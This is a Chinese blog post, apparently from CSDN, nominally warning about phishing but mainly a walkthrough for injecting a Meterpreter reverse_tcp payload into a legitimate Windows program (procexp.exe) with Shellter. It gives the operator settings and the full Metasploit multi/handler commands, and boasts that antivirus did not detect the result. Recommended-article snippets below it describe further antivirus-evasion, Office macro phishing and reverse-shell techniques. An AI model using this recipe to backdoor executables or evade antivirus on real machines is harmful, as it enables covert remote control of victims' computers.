谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑

最新推荐文章于 2023-06-02 17:04:24 发布
最新推荐文章于 2023-06-02 17:04:24 发布
阅读量359 收藏 2
点赞数 1
分类专栏: web渗透测试心得
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108474327
版权

metaspolit配合shellter渗透windows

shellter工具出来有一段时间了,现在用可能被杀软查杀,写这边文章主要展示下,怎么样轻松搞定,HACK WINDOWS PC。

shellter工具下载地址:
https://www.shellterproject.com/download/

我这里下载windows版本,下载后解压
在这里插入图片描述
运行shellter.exe
在这里插入图片描述
1、Choose Operation Mode - Auto/Manual (A/M/H): A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
2、PE Target: //输入要注入shellcode的程序,我这里用PE Target:procexp.exe
3、Enable Stealth Mode? (Y/N/H):N 不开启隐身模式
在这里插入图片描述
4、Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload

5、Select payload by index: 1 //选择第一个,即meterpreter_reverse_tcp

6、SET LHOST: 192.168.78.128 //设置反弹回来的IP 本机,也是运行msf主机的ip地址

7、SET LPORT:4444 //设置接收反弹的端口
在这里插入图片描述
到这里,带后门的procexp.exe程序就生成好了。

开启msf,输入如下命令进行配置

msfconsole
search multi/handler
use exploit/multi/handler
show payloads
set payload windows/meterpreter/reverse_tcp
show options //查看需要配置的参数
set lhost 192.168.78.128
set lport 4444
show options //检查参数是否配置成功
run  //监听

运行procexp.exe,目标上线,神奇的是杀软居然没报毒
在这里插入图片描述
运行真正的procexp.exe检查进程
在这里插入图片描述
关掉msf,重启监听,再次运行被注入代码的程序,目标再次上线,还是不报毒
在这里插入图片描述
突然觉点有点……
在这里插入图片描述

tempulcc
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellter使用及免杀测试
时乙的博客
10-14 3639
shellter是一个开源的老牌免杀工具,最初版在2014年发布,现在已经到Shellter Pro v4.0了。它利⽤动态Shellcode注⼊或者命令来实现免杀的效果。 shellter安装 shellter在kali中是自带的,再接在命令行shellter就可以。 如果想在windows中安装的话就去官方下载源码包: https://www.shellterproject.com/download/ 下载后解压,直接在命令行就可以用,不需要安装。 shellter使用 以下所有的演示都是
MSF配合shellter实现360免杀
weixin_44508748的博客
04-29 975
利用shellter工具将MSF生成的木马文件与其他文件捆绑在一起,达到绕过杀毒软件建立会话控制服务器的目的。本次的绕过的杀毒软件为360。 攻击/kali/192.168.1.7 靶机/win7/ 一、运行shellter工具 ①下载shellter: apt-get install shellter ②安装Windows运行环境(等待时间稍长) dpkg --add-architecture...
一款用于PE文件绑定免杀的工具: Shellter
xf555er的博客
01-26 1397
Shellter是一种动态进制程序壳程序,它可以在现有的可执行文件中隐藏恶意软件。它使用动态链接库技术来实现恶意代码的注入,并且可以在不修改现有的可执行文件的情况下进行注入。这使得它非常难以检测,因为它不会改变文件的哈希值或数字签名Shellter的官方下载地址:https://www.shellterproject.com/当前Shellter最新免费版本是v7.2,最新收费版本是v_pro4.7。
MSF&Powershell钓鱼攻击
p01son的博客
06-02 311
Powershell是windows下面非常强大的命令行工具,Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。
红队简单钓鱼实战---office宏
LvHLong的博客
05-30 1374
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office宏介绍 宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 宏病毒是一种常见的计算机病毒,......
shellter免杀技术实战
热门推荐
自学编程_youkewang.top
03-25 1万+
Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/   实验环境:kali  shellter_v6.9  360  putty.exe   图1-1.   Part1:首先使用unzip解压shellter_v6.9到当前目录,然后进入shell
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
MSF 配置自定义 Payload 控制目标主机权限 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,它提供了一个强大的框架来评估和模拟攻击各种类型的系统和网络。MSF 的 exploit 模块下是支持 set ...
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
在本课程中,我们探讨了如何使用Metasploit(MSF)框架配置自定义payload以控制目标主机权限。Metasploit是一个广泛使用的安全测试工具,它包含了大量的exploit模块和payload选项,允许安全专家模拟攻击行为,同时也...
MSDN视频:从需求到架构——MSF+UML在项目中的具体应用
02-24
在视频中,你将了解到如何根据MSF的四个阶段(初始化、规划、执行和交付)来组织项目流程,确保每个阶段的目标得以实现。 其次,UML(Unified Modeling Language)是一种标准化的建模语言,用于软件工程和其他领域...
M个案研究——微软如何使用MSF做软件开发学习教案.pptx
12-27
在本案研究中,微软介绍了如何使用MSF来开发SharePoint Team Services产品,包括目标产品的介绍、项目组的团队结构、开发过程和人员管理等方面的内容。 在开发过程中,微软使用MSF来指导开发团队,确保开发过程的...
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
关于利用shellter
我的天,bug!
08-01 4560
关键不在于怎么想,而在于怎么做。 今天给大家带来服务器提权之G6FTP提权(好久没写博客了,添点东西上去.....)。这里就不多废话,采用一款市面上的cms做演示站点(本人在这个cms上发现了严重的变量覆盖漏洞,影响站点很多,就不演示拿webshell了,)。 简介:Gene6FTP是一款FTP工具,使用的范围很广, 1、前提条件 你已经拿到了webshell
msfvenom & shellter——程序捆绑木马_端口映射远程控制
Ho1aAs‘s Blog
07-29 3771
文章目录一、工具&环境、准备三、木马与程序捆绑Ⅰ、msfvenom捆绑Ⅱ、shellter捆绑四、msfconsole监听完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、工具&环境 VMware V15.5 Kali-Linux-2020.2 msfconsole msfvenom shellter 花生壳 远程计算器 、准备 端口映射 使用花生壳将Kali的内网IP映射,端口号为默认4444 在CMD中Ping一下域名得到IP
kali下bypass avast的工具:Shellter
我的学习笔记
02-28 387
参考:https://www.youtube.com/watch?v=ezvPwG4SK4Q操作: apt-get install shellter -y cd /tmp 随便下载一个exe安装包或者应用,比如putty之类的,这里选取putty.exe shellter A putty.exe N L 1 监听者IP 监听者端口 msfconso...
我是如何诱骗你的-高级钓鱼技术一文中提到的MSF中的马和源代码
冷风
09-30 2117
外出过滤我们有两种方式来绕过外出过滤:reverse_https或者reverse_tcp_all_ports。不了解reverse_tcp_all_ports?它实际上是一个实现反向TCP管理并监控“所有端口”的模块。事实上它只监听一个端口,我们需要把所有端口重定向到它监控的端口。这就需要用到iptables或者其他的软件来实现。使用iptables举例,该命令将所有端口重定向到443端口(该端
shellter介绍
weixin_33941350的博客
10-22 684
或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。Shellter有一个自动模式,该模式会使整个操作过程变得十分的简单。在这篇文章中,我使用Kali 2.0作为主机,...
渗透之——Metasploit-Meterpreter Shell信息收集相关的命令
冰河的专栏
01-06 1803
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85944005 PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。 一、进程迁移 1、获取目标机正在运行的进程 ps 2.查看Meterpreter Shell的进程号 getpid 3.将Meterpreter Shell进程绑...
如何DIY一个简单的反弹Shell脚本
weixin_34200628的博客
12-12 225
00起因 之前在一个服务器上做测试的时候需要从本地连到服务器上,但是服务器没有开ssh服务,但是有python环境,想着自己写一个脚本可以从自己本地连接到服务器,然后服务器端可以将处理完的请求结果返回到本地。 0×01设计的构图           0×02编码实现 ① 服务器与本地实现通讯 首先我们编写在服务器端需要运行的程序,这个程序主要的功能就是接收传入的数据然后对传入的数据进行处理,...
编写一个msf脚本来自动扫描目标主机的开放端口
05-24
以下是一个简单的msf脚本,可以用于扫描目标主机的开放端口: ``` use auxiliary/scanner/portscan/tcp set RHOSTS <目标主机IP> run ``` 将上述脚本保存为一个文件(比如scan.rc),然后在msfconsole中使用`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值